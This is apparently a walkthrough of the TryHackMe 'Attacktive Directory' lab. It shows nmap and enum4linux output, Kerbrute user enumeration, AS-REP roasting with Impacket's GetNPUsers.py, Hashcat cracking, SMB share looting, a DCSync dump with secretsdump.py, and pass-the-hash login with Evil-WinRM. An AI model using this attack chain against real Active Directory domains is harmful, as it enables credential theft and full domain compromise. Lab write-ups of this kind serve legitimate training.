When it comes to attacking corporate network or infrastructure, an attacker’s first target would be Windows Active Directory. Because 99% of Corporate networks run off of AD. There are numerous vulnerabilities and exploits to take down a Windows based infrastructure.
Task 1 and Task 2
The tasks 1 and 2 are basic introduction and about prerequisites installation. You can skip to Task 3 if you have completed these steps.
So you’re likely here if you’ve had issues with Impacket. Impacket is moderately frustrating to say the least… A lot of people have issues with it, so let’s walk through the Impacket install process!
First, you’ll want to clone the repo with:
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
This will clone Impacket to /opt/impacket/, after the repo is cloned, you will notice several install related files, requirements.txt, and setup.py. Setup.py is commonly skipped during the installation. It’s key that you DO NOT miss it.
So let’s install the requirements:
pip3 install -r /opt/impacket/requirements.txt
Once all the python modules are installed, we can then run the python setup install script:
cd /opt/impacket/ && python3 ./setup.py install
After that, Impacket should be correctly installed now and it should be ready to use!
Task 3 – Enumerate the DC
Initial note: The user flags can be retrieved via RDP (login format is spookysec.local/User) and Administrator via Evil-WinRM.
let us start the enumeration with namp scanning. As we need to find ports up 10000 as per the task, we are going to scan and enumerate full port scan with OS detection, version detection, script scanning, trace route and running safe SMB scripts. Though we know the machine in Windows server, it is fine to run -A that returns more than OS detection.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 15:32 +03 NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 15:32 Completed NSE at 15:32, 0.00s elapsed Initiating NSE at 15:32 Completed NSE at 15:32, 0.00s elapsed Initiating NSE at 15:32 Completed NSE at 15:32, 0.00s elapsed Initiating Ping Scan at 15:32 Scanning 10.10.153.54 [4 ports] Completed Ping Scan at 15:32, 0.19s elapsed (1 total hosts) Initiating SYN Stealth Scan at 15:32 Scanning spookysec.local (10.10.153.54) [1000 ports] Discovered open port 135/tcp on 10.10.153.54 Discovered open port 445/tcp on 10.10.153.54 Discovered open port 139/tcp on 10.10.153.54 Discovered open port 3389/tcp on 10.10.153.54 Discovered open port 53/tcp on 10.10.153.54 Discovered open port 80/tcp on 10.10.153.54 Discovered open port 636/tcp on 10.10.153.54 Discovered open port 593/tcp on 10.10.153.54 Discovered open port 3268/tcp on 10.10.153.54 Discovered open port 3269/tcp on 10.10.153.54 Discovered open port 464/tcp on 10.10.153.54 Discovered open port 389/tcp on 10.10.153.54 Discovered open port 88/tcp on 10.10.153.54 Increasing send delay for 10.10.153.54 from 0 to 5 due to 333 out of 832 dropped probes since last increase. Completed SYN Stealth Scan at 15:32, 9.54s elapsed (1000 total ports) Initiating Service scan at 15:32 Scanning 13 services on spookysec.local (10.10.153.54) Completed Service scan at 15:35, 149.30s elapsed (13 services on 1 host) Initiating OS detection (try #1) against spookysec.local (10.10.153.54) Retrying OS detection (try #2) against spookysec.local (10.10.153.54) Retrying OS detection (try #3) against spookysec.local (10.10.153.54) Retrying OS detection (try #4) against spookysec.local (10.10.153.54) Retrying OS detection (try #5) against spookysec.local (10.10.153.54) Initiating Traceroute at 15:35 Completed Traceroute at 15:35, 0.15s elapsed Initiating Parallel DNS resolution of 2 hosts. at 15:35 Completed Parallel DNS resolution of 2 hosts. at 15:35, 0.01s elapsed NSE: Script scanning 10.10.153.54. Initiating NSE at 15:35 Completed NSE at 15:35, 16.14s elapsed Initiating NSE at 15:35 Completed NSE at 15:38, 121.42s elapsed Initiating NSE at 15:38 Completed NSE at 15:38, 0.00s elapsed Nmap scan report for spookysec.local (10.10.153.54) Host is up (0.14s latency). Not shown: 987 closed ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-29 12:33:05Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: THM-AD | NetBIOS_Domain_Name: THM-AD | NetBIOS_Computer_Name: ATTACKTIVEDIREC | DNS_Domain_Name: spookysec.local | DNS_Computer_Name: AttacktiveDirectory.spookysec.local | Product_Version: 10.0.17763 |_ System_Time: 2020-05-29T12:35:43+00:00 | ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local | Issuer: commonName=AttacktiveDirectory.spookysec.local | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2020-04-03T18:40:09 | Not valid after: 2020-10-03T18:40:09 | MD5: 7e5d 4925 1fee 57cc 0388 444d ae64 e8fc |_SHA-1: dbe7 8150 26b9 e188 2ed2 9259 396b 461e cc2f 0845 |_ssl-date: 2020-05-29T12:36:00+00:00; 0s from scanner time. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=5/29%Time=5ED10106%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=5/29%OT=53%CT=1%CU=43269%PV=Y%DS=2%DC=T%G=Y%TM=5ED1022 OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=I%CI=I%TS=U)SEQ(SP=1 OS:02%GCD=1%ISR=10E%TI=I%CI=I%II=I%TS=U)SEQ(SP=102%GCD=1%ISR=10E%TI=I%CI=I% OS:II=I%SS=S%TS=U)OPS(O1=M508NW8NNS%O2=M508NW8NNS%O3=M508NW8%O4=M508NW8NNS% OS:O5=M508NW8NNS%O6=M508NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6= OS:FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M508NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O% OS:A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF OS:=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=% OS:RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W OS:=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) OS:U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D OS:FI=N%T=80%CD=Z) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=258 (Good luck!) IP ID Sequence Generation: Incremental Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-05-29T12:35:47 |_ start_date: N/A TRACEROUTE (using port 22/tcp) HOP RTT ADDRESS 1 144.95 ms 10.11.0.1 2 145.35 ms spookysec.local (10.10.153.54) NSE: Script Post-scanning. Initiating NSE at 15:38 Completed NSE at 15:38, 0.00s elapsed Initiating NSE at 15:38 Completed NSE at 15:38, 0.00s elapsed Initiating NSE at 15:38 Completed NSE at 15:38, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 312.50 seconds Raw packets sent: 1666 (78.204KB) | Rcvd: 1301 (78.959KB)
We noticed a high number of open ports which is pretty normal in Windows ADDC infrastructure as there are a lot of services need to be run like LDAP, MSRPC, WSMAN, ADWS, Kerberos etc. The NMAP as well shows the domain name is spookysec.local, let us add this to our etc/hosts file in order to run Enum4Linux in the next step.
Btw, from enum we noticed there are 13 ports open and, not sure why THM answer section only says 11 are open. However, use 11 as answer and proceed.
Let us proceed with running Enum4Linux. E4L is a tool for enumerating data from Windows and Samba hosts. While Enum4Linux takes while to return the complete result, let us check the initial results to see if we can answer the questions.
- What is the Domain Name of the machine? – THM-AD
- What invalid TLD do people commonly use for their Active Directory Domain? – .local
Some Important Results From Enum4Linux Result:
============================================== | Getting domain SID for spookysec.local | ============================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359. Domain Name: THM-AD Domain Sid: S-1-5-21-3591857110-2884097990-301047963 [+] Host is part of a domain (not a workgroup) ========================================================================== | Users on spookysec.local via RID cycling (RIDS: 500-550,1000-1050) | ========================================================================== [I] Found new SID: S-1-5-21-3532885019-1334016158-1514108833 S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User) S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User) S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User) S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User) S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group) S-1-5-21-3591857110-2884097990-301047963-500 THM-AD\Administrator (Local User) S-1-5-21-3591857110-2884097990-301047963-501 THM-AD\Guest (Local User) S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\krbtgt (Local User) S-1-5-21-3591857110-2884097990-301047963-512 THM-AD\Domain Admins (Domain Group) S-1-5-21-3591857110-2884097990-301047963-513 THM-AD\Domain Users (Domain Group) S-1-5-21-3591857110-2884097990-301047963-514 THM-AD\Domain Guests (Domain Group) S-1-5-21-3591857110-2884097990-301047963-515 THM-AD\Domain Computers (Domain Group) S-1-5-21-3591857110-2884097990-301047963-516 THM-AD\Domain Controllers (Domain Group) S-1-5-21-3591857110-2884097990-301047963-517 THM-AD\Cert Publishers (Local Group) S-1-5-21-3591857110-2884097990-301047963-518 THM-AD\Schema Admins (Domain Group) S-1-5-21-3591857110-2884097990-301047963-519 THM-AD\Enterprise Admins (Domain Group) S-1-5-21-3591857110-2884097990-301047963-520 THM-AD\Group Policy Creator Owners (Domain Group) S-1-5-21-3591857110-2884097990-301047963-521 THM-AD\Read-only Domain Controllers (Domain Group) S-1-5-21-3591857110-2884097990-301047963-522 THM-AD\Cloneable Domain Controllers (Domain Group) S-1-5-21-3591857110-2884097990-301047963-525 THM-AD\Protected Users (Domain Group) S-1-5-21-3591857110-2884097990-301047963-526 THM-AD\Key Admins (Domain Group) S-1-5-21-3591857110-2884097990-301047963-527 THM-AD\Enterprise Key Admins (Domain Group) S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\ATTACKTIVEDIREC$ (Local User)
Task 4 – Enumerate the DC Pt 2
From our previous enum, we found that the Kerberos is running on the port 88. As we know the Kerberos is a key authentication service of Microsoft Active Directory feature. There is a tool called Kerbrute (by Ronnie Flathers @ropnop) that tries to attack on the port 88, and we can use it to brute force discovery of users, passwords and even password spray!
Let us start Kerbrute with userenum command to enumerate users inside the spookysec.local.
So we have discovered around 16 valid user names of the domain, but among them we noticed there is a Service account firstname.lastname@example.org and email@example.com stands apart. These accounts may help us to exploit further.
Task 5 – Exploiting Kerberos
As we now have the list of valid users, our next step is to abuse the Kerberos using a method called AS-REPRoasting (More: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/). AS-REPRoasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.
- Kerberos Pre-Authentication: Why It Should Not Be Disabled
- Cracking Active Directory Passwords with AS-REP Roasting
In this step we are going to use the Impacket tool called “GetNPUsers.py”. This tool try to scan active directory and if an account is Does not require Pre-Authentication” set, it will export the accounts TGT (Ticket Granting Ticket), then we can crack the TGT using Hashcat or similar tools.
As we already know the service accounts normally set Does not require Pre-authentication based on their access level, let us try to get the TGT of the only service account we have.
$ GetNPUsers.py spookysec.local/svc-admin -no-pass Impacket v0.9.22.dev1+20200520.120526.3f1e7ddd - Copyright 2020 SecureAuth Corporation [*] Getting TGT for svc-admin $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:57345010d2b5c9e510cb6c6a6df64764886975b8f633198aa4868ea1*************************************************************************************************7254a15370c12f303ce43636ed1d8e3be8e
Cracking The TGT
So we have the ticket hash and it’s time to crack it, from our experience we know that the windows TGT ihash name is “Kerberos 5 AS-REP etype 23” and the Hash Mode is 18200
More info here: https://hashcat.net/wiki/doku.php?id=example_hashes
let us fireup the Hashcat and start cracking.
And we got the hash cracked successfully
Task 6 – Enumerate the DC Pt 3
As we have the working credential, we now have significantly more access within the domain. We can now attempt to enumerate any shares that the domain controller may be giving out.
The machine has an authenticated SMB running, let us use the credential we have and enumerate it.
# root @ ns09 in ~/thm/AttacktiveDirectory [17:28:51] $ smbclient -L spookysec.local --user svc-admin Enter WORKGROUP\svc-admin's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin backup Disk C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available # root @ ns09 in ~/thm/AttacktiveDirectory [17:33:39]
By running SMBClient we found 6 remote shares in the server. We noticed there is a share named backup, let us see what it hosts.
Running SMBClient again and looking inside the backup folder we found a text file backup_credentials.txt, after downloading and reading it, there is a base65 encoded data, let us try to decode and see what it is.
Ok, it is the password of user firstname.lastname@example.org. Now we have a credential of a real user.
Task 7 – Elevating Privileges
Now that we have new user account credentials, we may have more privileges on the system than before. As said above since the credential is of a user, this will let us to get all the password hashes that this user account in the domain. For this purpose we could use a tool called secretsdump.py.
The secretdump.py uses DRSUAPI method to dump NTDS.DIT secrets. With having hashes we avoid spending time on cracking it and use the tool that allows method called “Pass The Hash” that could allow us to authenticate as the user without the clear text password.
In our case we decided to use Evil-WinRM and use the -H option to Pass The Hash instead password and got all the flags from different users.
And that’s it, we have completely owned the machine now. As you can see above; you can grab the remaining three flags from each users desktop.
Thank you for reading.